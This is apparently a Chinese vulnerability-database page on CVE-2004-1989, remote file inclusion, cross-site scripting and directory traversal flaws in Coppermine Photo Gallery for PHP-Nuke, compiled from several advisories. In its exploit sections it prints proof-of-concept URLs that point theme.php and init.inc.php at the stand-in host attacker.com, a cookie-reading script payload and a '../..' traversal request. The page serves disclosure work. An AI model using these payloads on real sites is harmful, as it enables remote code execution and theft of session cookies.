CVE-2004-1989
CVSS7.5
发布时间 :2004-04-30 00:00:00
修订时间 :2016-10-17 23:04:23
NMCOES    

[原文]PHP remote file inclusion vulnerability in theme.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to execute arbitrary PHP code by modifying the THEME_DIR parameter to reference a URL on a remote web server that contains user_list_info_box.inc.


[CNNVD]Coppermine Photo Gallery 多个输入验证漏洞(CNNVD-200404-104)

        
        Coppermine Photo Gallery是一款基于WEB的图形库管理程序。
        Coppermine Photo Gallery多处对用户提交的输入缺少充分过滤,远程攻击者可以利用这些漏洞执行任意命令,获得COOKIE数据,获得敏感文件路径等信息。
        具体问题如下:
        1、路径泄露:
        直接访问一些配置脚本,可获得敏感路径信息。
        2、跨站脚本攻击
        coppermine/docs/menu.inc.php'对用户提交URI缺少过滤,攻击者利用这个漏洞可获得敏感信息。
        3、任意目录浏览:
        如果有PHP-Nuke管理员权限,访问coppermine模块可绕过目录限制访问其他文件。
        4、任意命令执行:
        如果有PHP-Nuke管理员权限,访问coppermine模块,可在coppermine配置面板部分参数中输入SHELL命令,而以WEB进程权限执行。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:coppermine:coppermine_photo_gallery:1.2
cpe:/a:francisco_burzi:php-nuke:7.2
cpe:/a:coppermine:coppermine_photo_gallery:1.0_rc3
cpe:/a:francisco_burzi:php-nuke:7.0
cpe:/a:coppermine:coppermine_photo_gallery:1.1_.0
cpe:/a:coppermine:coppermine_photo_gallery:1.2.1
cpe:/a:francisco_burzi:php-nuke:7.1
cpe:/a:francisco_burzi:php-nuke:7.0_final
cpe:/a:coppermine:coppermine_photo_gallery:1.1_beta_2
cpe:/a:francisco_burzi:php-nuke:6.9
cpe:/a:coppermine:coppermine_photo_gallery:1.2.2_b

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1989
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1989
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-104
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108360247732014&w=2
(UNKNOWN)  BUGTRAQ  20040502 [waraxe-2004-SA#026 - Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke]
http://securitytracker.com/id?1010001
(UNKNOWN)  SECTRACK  1010001
http://www.securityfocus.com/bid/10253
(VENDOR_ADVISORY)  BID  10253
http://www.waraxe.us/index.php?modname=sa&id=26
(VENDOR_ADVISORY)  MISC  http://www.waraxe.us/index.php?modname=sa&id=26
http://xforce.iss.net/xforce/xfdb/16041
(VENDOR_ADVISORY)  XF  coppermine-multiple-file-include(16041)

- 漏洞信息

Coppermine Photo Gallery 多个输入验证漏洞
高危 输入验证
2004-04-30 00:00:00 2006-09-28 00:00:00
远程  
        
        Coppermine Photo Gallery是一款基于WEB的图形库管理程序。
        Coppermine Photo Gallery多处对用户提交的输入缺少充分过滤,远程攻击者可以利用这些漏洞执行任意命令,获得COOKIE数据,获得敏感文件路径等信息。
        具体问题如下:
        1、路径泄露:
        直接访问一些配置脚本,可获得敏感路径信息。
        2、跨站脚本攻击
        coppermine/docs/menu.inc.php'对用户提交URI缺少过滤,攻击者利用这个漏洞可获得敏感信息。
        3、任意目录浏览:
        如果有PHP-Nuke管理员权限,访问coppermine模块可绕过目录限制访问其他文件。
        4、任意命令执行:
        如果有PHP-Nuke管理员权限,访问coppermine模块,可在coppermine配置面板部分参数中输入SHELL命令,而以WEB进程权限执行。
        

- 公告与补丁

        厂商补丁:
        Coppermine
        ----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.chezgreg.net/coppermine/

- 漏洞信息 (24075)

Coppermine Photo Gallery 1.x theme.php Multiple Parameter Remote File Inclusion (EDBID:24075)
php webapps
2004-04-30 Verified
0 Janek Vind
N/A [点击下载]
source: http://www.securityfocus.com/bid/10253/info
   
Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands.
   
Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible.

http://www.example.com/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com 
http://www.example.com/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com 
http://www.example.com/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com		

- 漏洞信息

5912
Coppermine Photo Gallery theme.php Multiple Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Coppermine Photo Gallery contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when sending a specially crafted URL request to the theme.php script using the THEME_DIR variable to specify a malicious file from a remote system as a parameter. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-04-29 Unknow
2004-04-29 Unknow

- 解决方案

Upgrade to version 1.3beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Coppermine Photo Gallery Multiple Input Validation Vulnerabilities
Input Validation Error 10253
Yes No
2004-04-30 12:00:00 2006-09-25 09:01:00
Disclosure of these issues is credited to Janek Vind <come2waraxe@yahoo.com>.

- 受影响的程序版本

Francisco Burzi PHP-Nuke 7.2
Francisco Burzi PHP-Nuke 7.1
Francisco Burzi PHP-Nuke 7.0 FINAL
Francisco Burzi PHP-Nuke 7.0
Francisco Burzi PHP-Nuke 6.9
Coppermine Photo Gallery 1.2.2 b
Coppermine Photo Gallery 1.2.1
Coppermine Photo Gallery 1.2
Coppermine Photo Gallery 1.1 beta 2
Coppermine Photo Gallery 1.1 .0
Coppermine Photo Gallery 1.0 RC3

- 漏洞讨论

Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands.

Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible.

- 漏洞利用

No exploits are required to leverage these issues. The following proof-of-concept exploits have been provided:

Cross-site scripting proof of concept:
http://www.example.com/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>

Arbitrary directory browsing:
http://www.example.com/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

Remote file include:
http://www.example.com/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com
http://www.example.com/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://www.example.com/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://www.example.com/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站